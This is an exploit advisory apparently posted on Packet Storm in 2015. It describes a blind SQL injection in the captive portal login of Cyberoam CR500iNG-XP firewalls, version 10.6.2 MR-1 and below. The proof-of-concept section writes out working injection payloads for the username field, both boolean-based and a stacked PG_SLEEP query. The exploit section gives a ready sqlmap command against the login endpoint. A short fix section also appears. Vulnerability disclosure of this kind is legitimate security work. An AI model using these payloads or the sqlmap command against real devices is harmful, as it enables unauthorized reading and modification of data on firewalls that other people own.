what you don't know can hurt you

Cyberoam CR500iNG-XP - 10.6.2 MR-1 Blind SQL Injection

Cyberoam CR500iNG-XP - 10.6.2 MR-1 Blind SQL Injection
Posted Aug 31, 2015
Authored by Dharmendra Kumar Singh

Cyberoam versions CR500iNG-XP - 10.6.2 MR-1 and below suffer from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 53cbc332d1c5b3e762aa2fe57cf19080

Cyberoam CR500iNG-XP - 10.6.2 MR-1 Blind SQL Injection

Change Mirror Download
# Exploit Title: Cyberoam : Blind SQL Injection
# Date: 31/Aug/2015
# Exploit Author: Dharmendra Kumar Singh
# Contact: dsingh63@outlook.com
# Vendor Homepage: http://www.cyberoam.com
# Software Link: http://www.cyberoam.com/NGFW/
# Version: CR500iNG-XP - 10.6.2 MR-1
# Category: Firewall

1. Description

The username field in the captive portal of Cyberoam NG firewall is vulnerable to SQL Injection and can be exploited to execute sql commands on the database.

The username field is vulnerable to the following types of SQL Injections

a) Boolean-based blind sql injection
b) Stacked queries

2. Proof of Concept

The data send to the server while logging in through the captive portal is like "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0"
The query generated in backend server must be something like this
SELECT password FROM table_name WHERE username = 'cyberuser'

a) Boolean-based blind sql injection
If a valid username/password combination is known than boolean-based blind sql injection can be done. If username is set to cyberuser' AND 'x'='x , data send will be "mode=191&username=cyberuser' AND 'x'='x&password=cyberpass&a=1439886198757&producttype=0"
And sql query will become

SELECT password FROM table_name WHERE username = 'cyberuser' AND 'x'='x'
A successfull login message will be received in response in this case. But if username is set to cyberuser' AND 'x'='y than login fail message will be received in response, since x is not equal to y, hence this confirms that username field is vulnerable to boolean-based blind sql injection

b) Stacked queries
if username is set to cyberuser';SELECT PG_SLEEP(5) -- the resultant sql query will become
SELECT password FROM table_name WHERE username = 'cyberuser';SELECT PG_SLEEP(5) -- '
The stacked sql query "SELECT PG_SLEEP(5)" will make the current session’s process sleep until 5 seconds have elapsed. This confirms that Postgresql Server is used and stacked queries can be executed by providing crafted input to username field.

3. Exploit

Since the techniques are blind hence it is recommended to use an automated tool like SQLMap to exploit the vulnerability. The following command can be used to initiate the exploit
sqlmap.py -u "http://example.com:8090/login.xml" --data "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0"

4. Solution

The backend server scripts do not sanitize user-supplied data before using it in the SQL query. Hence by properly sanitizing the data received in GET variable "username", the vulnerability can be patched.

5. Conclusion

The Cyberoam NG Firewall devices <= Version: CR500iNG-XP - 10.6.2 MR-1 are vulnerable to blind SQL Injection and this vulnerability can be exploited by an attacker to compromise the application, access or modify data


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close